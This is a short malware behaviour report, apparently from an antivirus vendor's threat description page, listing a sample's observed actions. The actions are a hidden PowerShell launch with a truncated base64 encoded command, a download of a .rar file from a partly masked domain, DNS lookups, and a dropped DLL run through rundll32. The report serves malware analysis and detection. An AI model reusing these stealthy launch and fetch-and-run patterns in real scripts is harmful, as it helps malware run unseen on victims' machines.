Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ENCOD IAAkAFQASQBHACAAIAA9AFsAdAB5AFAAZQBdACgAIgB7ADMAfQB7ADAAfQB7ADUAfQB7ADQAfQB7ADEAfQB7ADIAfQAiAC0ARgAnAFkAUwB0ACcALAAnAGkATwAuAGQAJwAsACcASQBSAEUAQwB0AG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1492
- %TEMP%\1092943.cvr
- %HOMEPATH%\iok9bx2\xcnevd7\qdfo3phy.dll
- http://www.ad###.##laladvisor.com.au/ggvopq.rar
- DNS ASK nu########bnuwvbfigh0b.belchem.com
- DNS ASK ad###.##laladvisor.com.au
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Iok9bx2\Xcnevd7\Qdfo3phy.dll 0